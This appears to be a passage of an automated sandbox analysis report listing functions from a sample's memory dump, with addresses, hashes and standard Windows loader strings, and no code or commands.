                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-2986994758
                                                                                                                • Opcode ID: fdf613027d5fa5f3a1ccc151e8aae1c8fcba3d86fd17afcdd5daba81d79967e2
                                                                                                                • Instruction ID: 97e750b177d2e8799a65639319658a29c720d7f1f71996b8d7b3022f17c10214
                                                                                                                • Opcode Fuzzy Hash: fdf613027d5fa5f3a1ccc151e8aae1c8fcba3d86fd17afcdd5daba81d79967e2
                                                                                                                • Instruction Fuzzy Hash: C8F0C27A640319ABEB24EB4DCC46F9D3768FB41B54F22005EFA006F2D5D2F0AA04DA91
                                                                                                                Function 014B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: #%u
                                                                                                                • API String ID: 48624451-232158463
                                                                                                                • Opcode ID: 2006938eac39fc0e365da6021b400c740527b589acd66fe763e21343537b4c37
                                                                                                                • Instruction ID: afc14597d9013e12a7f7448f087bbc8109b6a1e40edac04edfa724d008ea2965
                                                                                                                • Opcode Fuzzy Hash: 2006938eac39fc0e365da6021b400c740527b589acd66fe763e21343537b4c37
                                                                                                                • Instruction Fuzzy Hash: 21713F71A0014A9FDB01DF99C994FAEB7F8BF58704F15406AE905EB2A1EA34ED01CB61
                                                                                                                Function 014AA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • LdrResSearchResource Exit, xrefs: 014AAA25
                                                                                                                • LdrResSearchResource Enter, xrefs: 014AAA13
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                • API String ID: 0-4066393604
                                                                                                                • Opcode ID: b18f3fa1d20f27bebeba18ae3954eac173f2e85b9ae9681918e3bd4e8e77bef4
                                                                                                                • Instruction ID: 83f8022c54c7c56d5ddfaf4ff92edee1d534f5396c06dc08f50a7be06b8f1a4e
                                                                                                                • Opcode Fuzzy Hash: b18f3fa1d20f27bebeba18ae3954eac173f2e85b9ae9681918e3bd4e8e77bef4
                                                                                                                • Instruction Fuzzy Hash: A0E1A571E002159FEF22CFD9C954BAEBBB9BF68310F61042BE911EB2A1D7349941CB50
                                                                                                                Function 0156A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `$`
                                                                                                                • API String ID: 0-197956300
                                                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                • Instruction ID: 362e78da5dc6782e75a90b3c6e6713deae9650cfee0dc1b1d6d7f137d36b6cbf
                                                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                • Instruction Fuzzy Hash: 06C1C1312043429BEB25CF28C841B6BBBE9BFD4318F184A2DF6969F290D774D905CB91
                                                                                                                Function 0151E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: Legacy$UEFI
                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                • Opcode ID: c0147b43eb631491488c7556e6109ec68076fdcafd5a398e0f2cfd8e5e6cd3fc
                                                                                                                • Instruction ID: 8c07884630426843461a2f80fd7cbff2faa3ba622b49876f9e1c9732e32fe3e1
                                                                                                                • Opcode Fuzzy Hash: c0147b43eb631491488c7556e6109ec68076fdcafd5a398e0f2cfd8e5e6cd3fc
                                                                                                                • Instruction Fuzzy Hash: 37615F71E00309AFEB16DFA9C841BADBBF5FB58700F14446EEA49EB295D731A940CB50
                                                                                                                Function 015443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$MUI
                                                                                                                • API String ID: 0-17815947
                                                                                                                • Opcode ID: e4a159a7873df207a503c37cba1af2897286548aaf8aca75299255e781b8f313
                                                                                                                • Instruction ID: 9f1566fee62f32b14bbc3a5f0ec24b0d1e6df7bbbeef72ea9d898258255c0f95
                                                                                                                • Opcode Fuzzy Hash: e4a159a7873df207a503c37cba1af2897286548aaf8aca75299255e781b8f313
                                                                                                                • Instruction Fuzzy Hash: D2512871D4021DAFDF11DFA9CC84FEEBBBCBB54658F10052AE615BB290D6709A058BA0
                                                                                                                Function 014A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • kLsE, xrefs: 014A0540
                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014A063D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                • API String ID: 0-2547482624
                                                                                                                • Opcode ID: 43b3019802395ac8f58d3950e48e8dc6c77e821f566b8f68dec6bd9410688b69
                                                                                                                • Instruction ID: 01e4e7eb6b17d001bb12ecfbe67605e21cc50c253525eaa76a43f23877b21239
                                                                                                                • Opcode Fuzzy Hash: 43b3019802395ac8f58d3950e48e8dc6c77e821f566b8f68dec6bd9410688b69
                                                                                                                • Instruction Fuzzy Hash: 0551BE715047428BD724EF69C4406A7BBE4AFA4304F52483FF6EA87361E770E549CB92
                                                                                                                Function 014AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 014AA2FB
                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 014AA309
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                • API String ID: 0-2876891731
                                                                                                                • Opcode ID: e1a8c3a807b97dd7dab5159d215fb6461f92a9e0889e9b99c4b531697baf87a5
                                                                                                                • Instruction ID: 5308aef21d46512a9922ac925e6ff9fe876f78be6c04d0f2adedaa52c396a0c9
                                                                                                                • Opcode Fuzzy Hash: e1a8c3a807b97dd7dab5159d215fb6461f92a9e0889e9b99c4b531697baf87a5
                                                                                                                • Instruction Fuzzy Hash: 6E41D131A00655DBEB12CF99C844BAE7BB4FFA5300F6540AAE900DF3A1E3B5D941CB50
                                                                                                                Function 014DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                • Opcode ID: 88bc82ded9fbc948470fa921c90b21a3f301935afa2c04c3510ea2ef6385c006
                                                                                                                • Instruction ID: 7f673eb34ef30477ee0e50e0663fe0135920abb232abbcec13d17e37f6a33cee
                                                                                                                • Opcode Fuzzy Hash: 88bc82ded9fbc948470fa921c90b21a3f301935afa2c04c3510ea2ef6385c006
                                                                                                                • Instruction Fuzzy Hash: F401D1B2244704EFE311DF14CE45F2677E8E794715F05893AA69CCB1A0E3B4D808CB46
                                                                                                                Function 014AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: MUI
                                                                                                                • API String ID: 0-1339004836
                                                                                                                • Opcode ID: bd7de83a0307a20a71dc78b094269711114fad53cf7883d5b383e204595d7cb8
                                                                                                                • Instruction ID: 1f5e06adcbb6258d44af1cc35f5acb62352c02d5b0e56911ff7729c3a5d251f5
                                                                                                                • Opcode Fuzzy Hash: bd7de83a0307a20a71dc78b094269711114fad53cf7883d5b383e204595d7cb8
                                                                                                                • Instruction Fuzzy Hash: AF827075E002189FEB64CFA9C8807EEBBB5BF68310F55816AD919AB7A0D7309D41CF50
                                                                                                                Function 0154A118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: cc1f6b4a72a35613c17ad7f3caead5f07f688ba40f7d4b094f72ff647dc1939f
                                                                                                                • Instruction ID: 6664d37504f34654c7cb95d5c3770d1d1fc8eb0ca4ee6a6bd66ae3ce40c5dab2
                                                                                                                • Opcode Fuzzy Hash: cc1f6b4a72a35613c17ad7f3caead5f07f688ba40f7d4b094f72ff647dc1939f
                                                                                                                • Instruction Fuzzy Hash: A322E3746446618FEBA5CF2DC09437ABBF1BF44308F088859E9978F286E735E452DB60
                                                                                                                Function 01526420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                • Opcode ID: 17aa09b2223d61f61d1e4d95dc2621fbc6d2c7e20b3c5d7f6ee1dacbd8dbcb2c
                                                                                                                • Instruction ID: 4c876a7bb3c4c6d1c1a10d1f04c107a6ef7631bf051ab7a4ae866c88817080e5
                                                                                                                • Opcode Fuzzy Hash: 17aa09b2223d61f61d1e4d95dc2621fbc6d2c7e20b3c5d7f6ee1dacbd8dbcb2c
                                                                                                                • Instruction Fuzzy Hash: DB915472A01229AFDB21DF95CD85FAE7BB8FF15B50F104059F600AB1E0D675AD04CB60
                                                                                                                Function 0154E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                • Opcode ID: 4562cb5e88536d4afb62454038f53fb3557df94230b10b016ba8748fe4fc7124
                                                                                                                • Instruction ID: 9504f8ea14079cf277b1800550fd33fb9e5d5539355077cef9bf8c7660b1c420
                                                                                                                • Opcode Fuzzy Hash: 4562cb5e88536d4afb62454038f53fb3557df94230b10b016ba8748fe4fc7124
                                                                                                                • Instruction Fuzzy Hash: 8D918032900605BBDB229FA6DC85FEFBBB9FF55754F14002AF505AB260D778A901CB50
                                                                                                                Function 014DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: GlobalTags
                                                                                                                • API String ID: 0-1106856819
                                                                                                                • Opcode ID: 31741a644143d5ab54594885901e01ed437a4abb39cd2a69f83cd360b51267a9
                                                                                                                • Instruction ID: 8427edf1898d2354b4a896fa67db373dd0fcc3ab1aaede5ba674b83e480899aa
                                                                                                                • Opcode Fuzzy Hash: 31741a644143d5ab54594885901e01ed437a4abb39cd2a69f83cd360b51267a9
                                                                                                                • Instruction Fuzzy Hash: 55719275E0020ADFEF2ACF9DD490AADBBF1BF58710F14852EE905AB254E7709841CB50
                                                                                                                Function 01544978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .mui
                                                                                                                • API String ID: 0-1199573805
                                                                                                                • Opcode ID: f192e8700cf1e745c2b3061d6a7a72c4cd27845a8fbcb0815baa8a1b5c39b4eb
                                                                                                                • Instruction ID: ab664b5e46c83110f6eb9b040e07a0b06ea38c3bb4745fb5a4f92ecba041ff33
                                                                                                                • Opcode Fuzzy Hash: f192e8700cf1e745c2b3061d6a7a72c4cd27845a8fbcb0815baa8a1b5c39b4eb
                                                                                                                • Instruction Fuzzy Hash: 5C519272D4022A9BDF10DF9AD840BAEBBB5BF14A58F05412EEA11BF250D7749C01CBE4
                                                                                                                Function 014BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: EXT-
                                                                                                                • API String ID: 0-1948896318
                                                                                                                • Opcode ID: 162adb6423bc9e083e352c21f08eec73ee127d02a77faea1fa51dc3e3e17251d
                                                                                                                • Instruction ID: 2274e75dc1cae08b85f24c095b850712ee7879eee7d9d0775906fd714db075e8
                                                                                                                • Opcode Fuzzy Hash: 162adb6423bc9e083e352c21f08eec73ee127d02a77faea1fa51dc3e3e17251d
                                                                                                                • Instruction Fuzzy Hash: A34192725083429BD711DA7AC880BEBB7E8AFD8614F44092FF684E7260E674D90587A2
                                                                                                                Function 0151C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BinaryHash
                                                                                                                • API String ID: 0-2202222882
                                                                                                                • Opcode ID: e7ab3d01322e0afd162735219ec60dda4565012ebdb78a4c84356b8fd1183ec3
                                                                                                                • Instruction ID: 40bbbf884657bbf761756cff339c687c5723059c8d89950dd0f66fba09b1c022
                                                                                                                • Opcode Fuzzy Hash: e7ab3d01322e0afd162735219ec60dda4565012ebdb78a4c84356b8fd1183ec3
                                                                                                                • Instruction Fuzzy Hash: C74144F1D4012DAAEF21DA50CC84FDEB77CBB54714F0045AAEA08AB154DB719E498FA4
                                                                                                                Function 01536B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: #
                                                                                                                • API String ID: 0-1885708031
                                                                                                                • Opcode ID: 13bff653ee37cd46fa9fac4942015afa5fa9c6341d3fa1eab61ec321bf964b4d
                                                                                                                • Instruction ID: ff5f152e55dccb5369e9c98f2b5ac3a272519eb13fbaec186ce9511fb49b698e
                                                                                                                • Opcode Fuzzy Hash: 13bff653ee37cd46fa9fac4942015afa5fa9c6341d3fa1eab61ec321bf964b4d
                                                                                                                • Instruction Fuzzy Hash: 29311831A0070DABEB22CB6AC854BEE7BB8EF94704F14402DE940AF292D775DA05CB50
                                                                                                                Function 0151CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BinaryName
                                                                                                                • API String ID: 0-215506332
                                                                                                                • Opcode ID: b16062512b248dd6d785aa8652a0ac85ad3b493ed4740d70a63b5827372c6075
                                                                                                                • Instruction ID: 8b60d5088ba360c7d23aea27030cce357e1ae4f796ba1019fa1aa91337e926d7
                                                                                                                • Opcode Fuzzy Hash: b16062512b248dd6d785aa8652a0ac85ad3b493ed4740d70a63b5827372c6075
                                                                                                                • Instruction Fuzzy Hash: 95310336A40519AFFB17DB59C845E6FBBB4FB80720F01416AA901EB250D771AE00DBE0
                                                                                                                Function 0152892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0152895E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                • API String ID: 0-702105204
                                                                                                                • Opcode ID: 3fe7d1efd75515bef6727ae53f8bd7e8c6f72c92c5e5f937979b2c5858e47e7a
                                                                                                                • Instruction ID: 2508dc65883dd6b7fe3a19415a45d0119e91bd97ec25efa732ef422eee29e64d
                                                                                                                • Opcode Fuzzy Hash: 3fe7d1efd75515bef6727ae53f8bd7e8c6f72c92c5e5f937979b2c5858e47e7a
                                                                                                                • Instruction Fuzzy Hash: 0901F7333102329BEF266F9A9884B6E7BE5FF93654F05045EF6411E5A1CB207854C793
                                                                                                                Function 01542000 Relevance: .8, Instructions: 757COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b71daa3c5ada4ff0a8dec278a3a0e71fb7b1415b430ff73687374c48c401357f
                                                                                                                • Instruction ID: 71a2ec5e043e23b49e2724376a0fbb0a8913fdb809f890a93b32ad35ffad1e3e
                                                                                                                • Opcode Fuzzy Hash: b71daa3c5ada4ff0a8dec278a3a0e71fb7b1415b430ff73687374c48c401357f
                                                                                                                • Instruction Fuzzy Hash: 3342E5366083518FE725CF69D890A6FBBE5FF98308F08492DFA869B250D770D845CB52
                                                                                                                Function 01538158 Relevance: .6, Instructions: 617COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 46a33fe37910f1223037e5431d5afc9d9abed0b26e84c7b761afd0f84f4e2b7f
                                                                                                                • Instruction ID: bf4d63ef4b6b072fd61f600b48272193092b25bf10191687c88067ff1f0581f4
                                                                                                                • Opcode Fuzzy Hash: 46a33fe37910f1223037e5431d5afc9d9abed0b26e84c7b761afd0f84f4e2b7f
                                                                                                                • Instruction Fuzzy Hash: 64426075E002198FEB25CF69C881BADBBF5BF94300F14819EE949EB251D7349985CF50
                                                                                                                Function 014B2840 Relevance: .6, Instructions: 605COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b7b6a4c0dbb548f54ccc007a51abc07ff437c2fc23aa47e3f98a88c2d10493e8
                                                                                                                • Instruction ID: cbbad1b5baf66c932c939f29a3a2b13fae8d4e178a748fdbfb674b0b69262589
                                                                                                                • Opcode Fuzzy Hash: b7b6a4c0dbb548f54ccc007a51abc07ff437c2fc23aa47e3f98a88c2d10493e8
                                                                                                                • Instruction Fuzzy Hash: 6E320370A007568FDB26CFA9C854BBEBBF2BF84304F24451ED54A9F284D775A922CB50
                                                                                                                Function 014A6A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6d309106eddc179eccd32fcb45d56250cf4146a0fbee93065afeada3c0a3352e
                                                                                                                • Instruction ID: 876860fe3ce0db2c54ecc8b5b6cdd20154af2efd3d285906d6c14c232d769e06
                                                                                                                • Opcode Fuzzy Hash: 6d309106eddc179eccd32fcb45d56250cf4146a0fbee93065afeada3c0a3352e
                                                                                                                • Instruction Fuzzy Hash: 5332D170A00615CFDB25CFA8C480BAEB7F1FF58300F5A456AE956AB3A1D730E841CB91
                                                                                                                Function 014C4A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                • Instruction ID: a34b9ef98f05a76593d6720e645aaa362e72136fcd3b53036fbadfe4e9585cd3
                                                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                • Instruction Fuzzy Hash: 87F18479E0020A9BDF55DF99C590BAEBBF5BF44B10F09812EE901AB360E734D842CB50
                                                                                                                Function 0153892B Relevance: .4, Instructions: 386COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d51909e401d7342bdd72409bb25d3706da67c4bebd168ddfaa99ce58dc1bd189
                                                                                                                • Instruction ID: 3c2c3073e3e0600657761813b50265d856a6ad82af60e37722e6f68a75954af1
                                                                                                                • Opcode Fuzzy Hash: d51909e401d7342bdd72409bb25d3706da67c4bebd168ddfaa99ce58dc1bd189
                                                                                                                • Instruction Fuzzy Hash: DBD1E271A0060A8BDF09CF69C841AFEB7F1BFC8314F188669E955AB241D735E906CB60
                                                                                                                Function 014A65D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f46aa0cacaa3bd2080a8132441f6533781def8dc41a22c172a0bca3f2ae71293
                                                                                                                • Instruction ID: d679ab4fd5d6c5249b7440124be8ca796ed5a223d9dd577f381cb7a0716230f0
                                                                                                                • Opcode Fuzzy Hash: f46aa0cacaa3bd2080a8132441f6533781def8dc41a22c172a0bca3f2ae71293
                                                                                                                • Instruction Fuzzy Hash: 7BE1A275508341CFC715CF28C090A6BBBE4FFA9314F4A896EE9998B361D731E905CB92
                                                                                                                Function 01498397 Relevance: .4, Instructions: 380COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
